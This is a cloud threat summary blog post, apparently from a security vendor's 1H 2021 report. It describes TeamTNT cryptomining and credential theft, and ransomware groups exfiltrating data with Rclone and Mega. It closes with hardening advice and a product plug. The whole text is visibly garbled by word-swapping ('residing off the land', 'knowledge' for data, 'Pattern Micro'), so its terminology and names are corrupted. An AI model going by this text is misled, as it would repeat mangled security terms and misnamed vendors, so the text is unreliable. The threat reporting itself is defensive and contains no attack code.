Threats Impacting Cloud Environments
In our first half report, we spotlight an APT group named TeamTNT that has been concentrating on clouds for fairly some time now. They’ve centered most of their efforts on planting crypto-mining malware on cloud servers in an effort to mine Monero cash, however we’ve got additionally seen them make the most of DDoS IRC bots, steal cloud account credentials, and exfil knowledge. As you possibly can see from the above diagram, all of those are finish targets for many assaults.
Talking of knowledge exfil, within the first half we noticed APT actors make the most of cloud-based file storage to exfiltrate their stolen knowledge. For instance, we discovered that Conti operators use the cloud storage synchronization instrument Rclone to add information to the Mega cloud storage service. Equally, DarkSide operators used Mega consumer for exfiltrating information to cloud storage, 7-Zip for archiving, and PuTTY software for community file transfers. This use of identified, reliable instruments shouldn’t be new; we name that ‘residing off the land’ and have seen this tactic decide up just lately, together with utilization by ransomware actors. Many organizations now want to take a look at methods of monitoring reliable instruments utilization inside their networks to determine any malicious makes use of.
Cloud Safety Structure
When creating your cloud safety structure and technique, it is very important at all times preserve the ends in thoughts. On this case, what are the motivation and finish targets of an attacker?
As you see within the picture above, most cloud assaults are going to fall into one in every of these areas. Relying on what you’re doing as a part of your cloud infrastructure, it’s best to have the ability to determine if all or any of those finish targets could possibly be focused in your setting. From there, you possibly can work backwards to develop your technique for safeguarding these preliminary entry areas tied to the completely different assaults.
A problem many organizations face is that the cloud is not easy, and most of the applied sciences that make up the cloud are new, with new options being deployed on a regular basis. Understanding how these work and – extra importantly – the right way to safe them might be very tough. Using a safety platform strategy might help construct your cloud to be safer, however educating your architects and directors may even assist. One key space is hardening your cloud account credentials, as these will likely be usually focused by malicious actors. Utilizing multi-factor authentication to entry all accounts can decrease this danger tremendously. Check out Pattern Micro Cloud One, a part of our full cybersecurity platform, to study extra.
The cloud is just one facet of our full 1H 2021 report. To get extra particulars on all of the completely different threats and assaults we noticed, obtain and browse the complete report here.